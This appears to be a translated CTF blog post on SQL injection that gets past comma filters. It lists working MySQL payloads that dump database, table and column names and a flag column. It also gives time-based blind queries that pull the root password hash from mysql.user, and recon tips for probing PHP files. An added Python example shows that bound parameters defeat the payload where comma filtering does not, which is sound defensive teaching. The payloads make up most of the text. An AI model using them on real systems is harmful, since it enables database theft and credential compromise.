Some challenges are nasty and filter out commas, so ordinary SQL injection payloads stop working. Here is a comma-free injection technique:
1' union select * from (select database()) a join (select version() ) b %23 //dump the database name
1' union select * from (select group_concat(table_name) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23 //dump the table names
1' union select * from (select group_concat(column_name) from information_schema.columns where table_name='users') a join (select version() ) b %23 //dump the column names
1' union select * from (select flag_9c861b688330 from users) a join (select version() ) b %23 //dump the data
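Added example (not from the original post): why rejecting commas does not stop the payload shape above, shown next to a bound-parameter query that does. SQLite stands in for the MySQL back end, and the tables, data and function names are constructed for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite is an assumption standing in for MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id TEXT, title TEXT)")
    db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    db.execute("INSERT INTO news VALUES ('1', 'hello')")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def lookup_filtered(db, user_id):
    # Weak pattern: reject commas, then concatenate the input into the statement.
    if "," in user_id:
        raise ValueError("comma rejected")
    sql = "SELECT id, title FROM news WHERE id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    # Hardened pattern: the value is bound, so it is compared as data, never parsed as SQL.
    sql = "SELECT id, title FROM news WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# Same shape as the first payload above (subqueries joined instead of a
# comma-separated column list), with SQLite's "-- " comment in place of %23.
PAYLOAD = ("1' union select * from (select name from users) a "
           "join (select secret from users) b -- ")

if __name__ == "__main__":
    db = make_db()
    print("comma in payload:", "," in PAYLOAD)
    print("filtered + concatenated:", lookup_filtered(db, PAYLOAD))
    print("bound parameter:       ", lookup_bound(db, PAYLOAD))
    print("bound, normal input:   ", lookup_bound(db, "1"))
```

The comma check only removes one spelling of the query; the bound version returns no rows for the payload because the whole string is treated as an id value.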
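Also, some CTF authors will try to lure you into their traps. Besides visiting the admin backend, also try common PHP files such as index.php and test.php, capture the traffic to see what differs, and look carefully at differences in the status codes to judge whether the backend holds any clues.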
————————————————————————————————————————————
select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1))=97);
127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
select case when substring((select password from mysql.user where user='root') from 1 for 1)='e' then sleep(5) else 0 end #
substring((select password from mysql.user where user='root') from -1)='e'
————————————————————————————————————————————
Here are some more example comma-free statements; change them as needed.
For details, see:
https://blog.csdn.net/nzjdsds/article/details/81322529